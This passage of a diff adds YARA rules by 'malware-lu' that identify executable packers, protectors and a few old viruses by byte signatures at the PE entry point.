+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 90 90 90 90 68 ?? ?? ?? ?? 67 64 FF 36 00 00 67 64 89 26 00 00 F1 90 90 90 90 BB D0 01 40 00 BF 00 10 40 00 BE 90 90 90 90 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 FC B2 80 A4 6A 02 5B }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ThemidaOreansTechnologies2004
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 00 00 00 00 60 0B C0 74 58 E8 00 00 00 00 58 05 43 00 00 00 80 38 E9 75 03 61 EB 35 E8 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VxNumberOne
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { F9 07 3C 53 6D 69 6C 65 3E E8 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule WinKriptv10MrCrimson
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 33 C0 8B B8 00 ?? ?? ?? 8B 90 04 ?? ?? ?? 85 FF 74 1B 33 C9 50 EB 0C 8A 04 39 C0 C8 04 34 1B 88 04 39 41 3B CA 72 F0 58 83 C0 08 EB D5 61 E9 ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule tElockv085f
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 02 00 00 00 CD 20 E8 00 00 00 00 5E 2B C9 58 74 02 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RosAsm2050aBetov
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 60 8B 5D 08 B9 08 00 00 00 BF ?? ?? ?? ?? 83 C7 07 FD 8A C3 24 0F 04 30 3C 39 76 02 04 07 AA C1 EB 04 E2 EE FC 68 00 10 00 00 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A 00 FF 15 ?? ?? ?? ?? 61 8B E5 5D C2 04 00 }
+
+condition:
+		$a0
+}
+	
+	
+rule Obsidium13021ObsidiumSoftware
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 03 ?? ?? ?? E8 2E 00 00 00 EB 04 ?? ?? ?? ?? EB 04 ?? ?? ?? ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 23 EB 01 ?? 33 C0 EB 04 ?? ?? ?? ?? C3 EB 03 ?? ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 01 ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 02 ?? ?? 50 EB 01 ?? 33 C0 EB 03 ?? ?? ?? 8B 00 EB 03 ?? ?? ?? C3 EB 03 ?? ?? ?? E9 FA 00 00 00 EB 04 ?? ?? ?? ?? E8 D5 FF FF FF EB 01 ?? EB 01 ?? 58 EB 04 ?? ?? ?? ?? EB 04 ?? ?? ?? ?? 64 67 8F 06 00 00 EB 03 ?? ?? ?? 83 C4 04 EB 04 ?? ?? ?? ?? E8 2B 26 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ASPackv211dAlexeySolodovnikov
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 02 00 00 00 EB 09 5D 55 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ASPackv211cAlexeySolodovnikov
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 02 00 00 00 EB 09 5D 55 81 ED 39 39 44 00 C3 E9 59 04 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ACProtect14xRISCOsoft
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 45 78 69 74 50 72 6F 63 65 73 73 00 00 00 4D 65 73 73 61 67 65 42 6F 78 41 00 90 4D 69 6E 65 49 6D 70 }
+
+condition:
+		$a0
+}
+	
+	
+rule SplashBitmapv100BoBBobsoft
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 00 00 00 00 60 8B 6C 24 20 55 81 ED ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 29 F9 31 C0 FC F3 AA 8B 04 24 48 66 25 00 F0 66 81 38 4D 5A 75 F4 8B 48 3C 81 3C 01 50 45 00 00 75 E8 89 85 ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 6A 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PEZipv10byBaGIE
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { D9 D0 F8 74 02 23 DB F5 F5 50 51 52 53 8D 44 24 10 50 55 56 57 D9 D0 22 C9 C1 F7 A0 55 66 C1 C8 B0 5D 81 E6 FF FF FF FF F8 77 07 52 76 03 72 01 90 5A C1 E0 60 90 BD 1F 01 00 00 87 E8 E2 07 E3 05 17 5D 47 E4 42 41 7F 06 50 66 83 EE 00 58 25 FF FF FF FF 51 }
+
+condition:
+		$a0
+}
+	
+	
+rule LamerStopv10ccStefanEsser
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 ?? ?? 05 ?? ?? CD 21 33 C0 8E C0 26 ?? ?? ?? 2E ?? ?? ?? 26 ?? ?? ?? 2E ?? ?? ?? BA ?? ?? FA }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ACProtectV14Xrisco
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 01 00 00 00 7C 83 04 24 06 C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VxGRUNT2Family
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 48 E2 F7 C3 51 53 52 E8 DD FF 5A 5B 59 C3 B9 00 00 E2 FE C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule AHTeamEPProtector03fakeMicrosoftVisualC70FEUERRADER
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 90 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 90 FF E0 6A 00 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? BF ?? ?? ?? ?? 8B C7 E8 ?? ?? ?? ?? 89 65 00 8B F4 89 3E 56 FF 15 ?? ?? ?? ?? 8B 4E ?? 89 0D ?? ?? ?? 00 8B 46 00 A3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule InstallStub32bit
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 81 EC 14 ?? 00 00 53 56 57 6A 00 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 74 29 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VcasmProtector10evcasm
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 0A 5B 56 50 72 6F 74 65 63 74 5D }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule MSLRHv032afakePEBundle20x24xemadicius
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 9C 60 E8 02 00 00 00 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 07 30 40 00 87 DD 83 BD 9C 38 40 00 01 61 9D EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Armadillov190b4
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 08 E2 40 00 68 B4 96 40 00 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 83 EC 58 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule UPXv103v104Modified
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 01 DB ?? 07 8B 1E 83 EE FC 11 DB 8A 07 ?? EB B8 01 00 00 00 01 DB ?? 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 EF }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule NsPackV2XLiuXingPing
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 6E 73 70 61 63 6B 24 40 }
+
+condition:
+		$a0
+}
+	
+	
+rule ThemidaWinLicenseV1000V1800OreansTechnologies
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 00 00 00 00 60 0B C0 74 58 E8 00 00 00 00 58 05 ?? 00 00 00 80 38 E9 75 ?? 61 EB ?? E8 00 00 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PACKWINv101p
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 8C C0 FA 8E D0 BC ?? ?? FB 06 0E 1F 2E ?? ?? ?? ?? 8B F1 4E 8B FE 8C DB 2E ?? ?? ?? ?? 8E C3 FD F3 A4 53 B8 ?? ?? 50 CB }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PECompactv110b1
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 28 63 40 ?? 87 DD 8B 85 AD 63 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule MicroJoiner15coban2k
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BF 05 10 40 00 83 EC 30 8B EC E8 C8 FF FF FF E8 C3 FF FF FF }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ANDpakk2018byDmitryANDAndreev
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { FC BE D4 00 40 00 BF 00 ?? ?? 00 57 83 CD FF 33 C9 F9 EB 05 A4 02 DB 75 05 8A 1E 46 12 DB 72 F4 33 C0 40 02 DB 75 05 8A 1E 46 12 DB 13 C0 02 DB 75 05 8A 1E 46 12 DB 72 0E 48 02 DB 75 05 8A 1E 46 12 DB 13 C0 EB DC 83 E8 03 72 0F C1 E0 08 AC 83 F0 FF 74 4D D1 F8 8B E8 EB 09 02 DB 75 05 8A 1E 46 12 DB 13 C9 02 DB 75 05 8A 1E 46 12 DB 13 C9 75 1A 41 02 DB 75 05 8A 1E 46 12 DB 13 C9 02 DB 75 05 8A 1E 46 12 DB 73 EA 83 C1 02 81 FD 00 FB FF FF 83 D1 01 56 8D 34 2F F3 A4 5E E9 73 FF FF FF C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PECompactv110b2
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F 60 40 ?? 87 DD 8B 85 94 60 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PECompactv110b5
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F 60 40 ?? 87 DD 8B 85 95 60 40 ?? 01 85 03 60 40 ?? 66 C7 85 ?? 60 40 ?? 90 90 BB 49 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule NJoy10NEX
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 C4 F0 B8 9C 3B 40 00 E8 8C FC FF FF 6A 00 68 E4 39 40 00 6A 0A 6A 00 E8 40 FD FF FF E8 EF F5 FF FF 8D 40 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PECompactv110b7
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F 60 40 ?? 87 DD 8B 85 9A 60 40 ?? 01 85 03 60 40 ?? 66 C7 85 ?? 60 40 ?? 90 90 01 85 92 60 40 ?? BB 14 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PECompactv110b6
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 06 68 ?? ?? ?? ?? C3 9C 60 E8 02 ?? ?? ?? 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 0F 60 ?? 00 87 DD 8B 85 9A 60 40 ?? 01 85 03 60 40 ?? 66 C7 85 ?? 60 40 ?? 90 90 01 85 92 60 40 ?? BB B7 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule KBysPacker028BetaShoooo
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 5E 83 EE 0A 8B 06 03 C2 8B 08 89 4E F3 83 EE 0F 56 52 8B F0 AD AD 03 C2 8B D8 6A 04 BF 00 10 00 00 57 57 6A 00 FF 53 08 5A 59 BD 00 80 00 00 55 6A 00 50 51 52 50 89 06 AD AD 03 C2 50 AD 03 C2 FF D0 6A 04 57 AD 50 6A 00 FF 53 }
+
+condition:
+		$a0
+}
+	
+	
+rule nPack113002006BetaNEOx
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 83 3D ?? ?? ?? ?? ?? 75 05 E9 01 00 00 00 C3 E8 46 00 00 00 E8 73 00 00 00 B8 ?? ?? ?? ?? 2B 05 ?? ?? ?? ?? A3 ?? ?? ?? ?? E8 9C 00 00 00 E8 2D 02 00 00 E8 DD 06 00 00 E8 2C 06 00 00 A1 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 01 05 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? C3 C3 56 57 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 8B F8 68 ?? ?? ?? ?? 57 FF D6 68 ?? ?? ?? ?? 57 A3 ?? ?? ?? ?? FF D6 5F A3 ?? ?? ?? ?? 5E C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PseudoSigner02BorlandC1999Anorganix
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 10 66 62 3A 43 2B 2B 48 4F 4F 4B 90 E9 90 90 90 90 A1 ?? ?? ?? ?? A3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ASPackv100bAlexeySolodovnikov
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 ?? ?? ?? ?? 5D 81 ED 92 1A 44 ?? B8 8C 1A 44 ?? 03 C5 2B 85 CD 1D 44 ?? 89 85 D9 1D 44 ?? 80 BD C4 1D 44 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SEAAXEv22
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { FC BC ?? ?? 0E 1F A3 ?? ?? E8 ?? ?? A1 ?? ?? 8B ?? ?? ?? 2B C3 8E C0 B1 03 D3 E3 8B CB BF ?? ?? 8B F7 F3 A5 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PureBasic4xDLLNeilHodgson
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 83 7C 24 08 01 75 0E 8B 44 24 04 A3 ?? ?? ?? 10 E8 22 00 00 00 83 7C 24 08 02 75 00 83 7C 24 08 00 75 05 E8 ?? 00 00 00 83 7C 24 08 03 75 00 B8 01 00 00 00 C2 0C 00 68 00 00 00 00 68 00 10 00 00 68 00 00 00 00 E8 ?? 0F 00 00 A3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EXEPackerv70byTurboPowerSoftware
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 1E 06 8C C3 83 ?? ?? 2E ?? ?? ?? ?? B9 ?? ?? 8C C8 8E D8 8B F1 4E 8B FE }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VxSYP
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 47 8B C2 05 1E 00 52 8B D0 B8 02 3D CD 21 8B D8 5A }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule DSHIELD
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 06 E8 ?? ?? 5E 83 EE ?? 16 17 9C 58 B9 ?? ?? 25 ?? ?? 2E }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule kkrunchy023alphaRyd
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BD 08 ?? ?? 00 C7 45 00 ?? ?? ?? 00 FF 4D 08 C6 45 0C 05 8D 7D 14 31 C0 B4 04 89 C1 F3 AB BF ?? ?? ?? 00 57 BE ?? ?? ?? 00 31 C9 41 FF 4D 0C 8D 9C 8D A0 00 00 00 FF D6 10 C9 73 F3 FF 45 0C 91 AA 83 C9 FF 8D 5C 8D 18 FF D6 74 DD E3 17 8D 5D 1C FF D6 74 10 8D 9D A0 08 00 00 E8 ?? 00 00 00 8B 45 10 EB 42 8D 9D A0 04 00 00 E8 ?? 00 00 00 49 49 78 40 8D 5D 20 74 03 83 C3 40 31 D2 42 E8 ?? 00 00 00 8D 0C 48 F6 C2 10 74 F3 41 91 8D 9D A0 08 00 00 E8 ?? 00 00 00 3D 00 08 00 00 83 D9 FF 83 F8 60 83 D9 FF 89 45 10 56 89 FE 29 C6 F3 A4 5E EB 90 BE ?? ?? ?? 00 BB ?? ?? ?? 00 55 46 AD 85 C0 74 ?? 97 56 FF 13 85 C0 74 16 95 AC 84 C0 75 FB 38 06 74 E8 78 ?? 56 55 FF 53 04 AB 85 C0 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule NJoy12NEX
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 83 C4 F0 B8 A4 32 40 00 E8 E8 F1 FF FF 6A 00 68 54 2A 40 00 6A 0A 6A 00 E8 A8 F2 FF FF E8 C7 EA FF FF 8D 40 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule AntiDote12DemoSISTeam
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 F7 FE FF FF 05 CB 22 00 00 FF E0 E8 EB FE FF FF 05 BB 19 00 00 FF E0 E8 BD 00 00 00 08 B2 62 00 01 52 17 0C 0F 2C 2B 20 7F 52 79 01 30 07 17 29 4F 01 3C 30 2B 5A 3D C7 26 11 26 06 59 0E 78 2E 10 14 0B 13 1A 1A 3F 64 1D 71 33 57 21 09 24 8B 1B 09 37 08 61 0F 1D 1D 2A 01 87 35 4C 07 39 0B }
+
+condition:
+		$a0
+}
+	
+	
+rule EXE32Packv137
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 3B C0 74 02 81 83 55 3B C0 74 02 81 83 53 3B C9 74 01 BC ?? ?? ?? ?? 02 81 ?? ?? ?? ?? ?? ?? ?? 3B DB 74 01 BE 5D 8B D5 81 ED 4C 8E 40 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EXE32Packv136
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 3B C0 74 02 81 83 55 3B C0 74 02 81 83 53 3B C9 74 01 BC ?? ?? ?? ?? 02 81 ?? ?? ?? ?? ?? ?? ?? 3B DB 74 01 BE 5D 8B D5 81 ED CC 8D 40 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule AINEXEv230
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 0E 07 B9 ?? ?? BE ?? ?? 33 FF FC F3 A4 A1 ?? ?? 2D ?? ?? 8E D0 BC ?? ?? 8C D8 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ThinstallEmbedded20XJitit
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { B8 EF BE AD DE 50 6A 00 FF 15 ?? ?? ?? ?? E9 AD FF FF FF 8B C1 8B 4C 24 04 89 88 29 04 00 00 C7 40 0C 01 00 00 00 0F B6 49 01 D1 E9 89 48 10 C7 40 14 80 00 00 00 C2 04 00 8B 44 24 04 C7 41 0C 01 00 00 00 89 81 29 04 00 00 0F B6 40 01 D1 E8 89 41 10 C7 41 14 80 00 00 00 C2 04 00 55 8B EC 53 56 57 33 C0 33 FF 39 45 0C 8B F1 76 0C 8B 4D 08 03 3C 81 40 3B 45 0C 72 F4 8B CE E8 43 00 00 00 8B 46 14 33 D2 F7 F7 8B 5E 10 33 D2 8B F8 8B C3 F7 F7 89 7E 18 89 45 0C 33 C0 33 C9 8B 55 08 03 0C 82 40 39 4D 0C 73 F4 48 8B 14 82 2B CA 0F AF CF 2B D9 0F AF FA 89 7E 14 89 5E 10 5F 5E 5B 5D C2 08 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EXECryptorv151x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 24 ?? ?? ?? 8B 4C 24 0C C7 01 17 ?? 01 ?? C7 81 B8 ?? ?? ?? ?? ?? ?? ?? 31 C0 89 41 14 89 41 18 80 A1 C1 ?? ?? ?? FE C3 31 C0 64 FF 30 64 89 20 CC C3 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Obsidiumv1304ObsidiumSoftware
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 02 ?? ?? E8 25 00 00 00 EB 04 ?? ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 23 EB 01 ?? 33 C0 EB 02 ?? ?? C3 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 01 ?? 50 EB 01 ?? 33 C0 EB 01 }
+	$a1 = { EB 02 ?? ?? E8 25 00 00 00 EB 04 ?? ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 23 EB 01 ?? 33 C0 EB 02 ?? ?? C3 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 01 ?? 50 EB 01 ?? 33 C0 EB 01 ?? 8B 00 EB 01 ?? C3 EB 02 ?? ?? E9 FA 00 00 00 EB 02 ?? ?? E8 D5 FF FF FF EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 58 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 64 67 8F 06 00 00 EB 03 ?? ?? ?? 83 C4 04 EB 01 ?? E8 3B 26 00 00 }
+
+condition:
+		$a0 at pe.entry_point or $a1 at pe.entry_point
+}
+	
+	
+rule CopyProtectorv20
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 2E A2 ?? ?? 53 51 52 1E 06 B4 ?? 1E 0E 1F BA ?? ?? CD 21 1F }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EXE32Packv139
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 3B C0 74 02 81 83 55 3B C0 74 02 81 83 53 3B C9 74 01 BC ?? ?? ?? ?? 02 81 ?? ?? ?? ?? ?? ?? ?? 3B DB 74 01 BE 5D 8B D5 81 ED EC 8D 40 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EXE32Packv138
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 3B C0 74 02 81 83 55 3B C0 74 02 81 83 53 3B C9 74 01 BC ?? ?? ?? ?? 02 81 ?? ?? ?? ?? ?? ?? ?? 3B DB 74 01 BE 5D 8B D5 81 ED DC 8D 40 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule FSGv110EngdulekxtBorlandC1999
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { EB 02 CD 20 2B C8 68 80 ?? ?? 00 EB 02 1E BB 5E EB 02 CD 20 68 B1 2B 6E 37 40 5B 0F B6 C9 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule ThinstallEmbedded2547V2600Jitit
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { E8 00 00 00 00 58 BB BC 18 00 00 2B C3 50 68 ?? ?? ?? ?? 68 60 1B 00 00 68 60 00 00 00 E8 35 FF FF FF E9 99 FF FF FF 00 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule FSGv131Engdulekxt
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? 00 53 BB ?? ?? ?? 00 B2 80 A4 B6 80 FF D3 73 F9 33 C9 FF D3 73 16 33 C0 FF D3 73 23 B6 80 41 B0 10 FF D3 12 C0 73 FA 75 42 AA EB E0 E8 46 00 00 00 02 F6 83 D9 01 75 10 E8 38 00 00 00 EB 28 AC D1 E8 74 48 13 C9 EB }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SDProtectorBasicProEdition110RandyLi
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 1D 32 13 05 68 88 88 88 08 64 A1 00 00 00 00 50 64 89 25 00 00 00 00 58 64 A3 00 00 00 00 58 58 58 58 8B E8 50 83 EC 08 64 A1 00 00 00 00 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 83 C4 08 50 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 64 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule Petite12c1998IanLuck
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 66 9C 60 E8 CA 00 00 00 03 00 04 00 05 00 06 00 07 00 08 00 09 00 0A 00 0B 00 0D 00 0F 00 11 00 13 00 17 00 1B 00 1F 00 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 83 00 A3 00 C3 00 E3 00 02 01 00 00 00 00 00 00 00 00 00 00 00 00 01 01 01 01 02 02 02 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule PcSharev40
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 8B EC 6A FF 68 90 34 40 00 68 B6 28 40 00 64 A1 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule VProtector0X12Xvcasm
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 00 00 56 69 72 74 75 61 6C 41 6C 6C 6F 63 00 00 00 00 00 76 63 61 73 6D 5F 70 72 6F 74 65 63 74 5F ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 33 F6 E8 10 00 00 00 8B 64 24 08 64 8F 05 00 00 00 00 58 EB 13 C7 83 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 AD CD 20 EB 01 0F 31 F0 EB 0C 33 C8 EB 03 EB 09 0F 59 74 05 75 F8 51 EB F1 B9 04 00 00 00 E8 1F 00 00 00 EB FA E8 16 00 00 00 E9 EB F8 00 00 58 EB 09 0F 25 E8 F2 FF FF FF 0F B9 49 75 F1 EB 05 EB F9 EB F0 D6 E8 07 00 00 00 C7 83 83 C0 13 EB 0B 58 EB 02 CD 20 83 C0 02 EB 01 E9 50 C3 }
+
+condition:
+		$a0
+}
+	
+	
+rule STNPEE113
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 55 57 56 52 51 53 E8 00 00 00 00 5D 8B D5 81 ED 97 3B 40 00 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule SoftDefenderV11xRandyLi
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 74 07 75 05 19 32 67 E8 E8 74 1F 75 1D E8 68 39 44 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule CDCopsII
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 53 60 BD ?? ?? ?? ?? 8D 45 ?? 8D 5D ?? E8 ?? ?? ?? ?? 8D }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule RLPack11BasicEditionap0x
+{
+      meta:
+		author="malware-lu"
+strings:
+		$a0 = { 60 E8 00 00 00 00 8B 2C 24 83 C4 04 8D B5 4A 02 00 00 8D 9D 11 01 00 00 33 FF EB 0F FF 74 37 04 FF 34 37 FF D3 83 C4 08 83 C7 08 83 3C 37 00 75 EB 8D 74 37 04 53 6A 40 68 00 10 00 00 68 }
+
+condition:
+		$a0 at pe.entry_point
+}
+	
+	
+rule EXE32Packv13x
+{
+      meta:
+		author="malware-lu"
+strings:
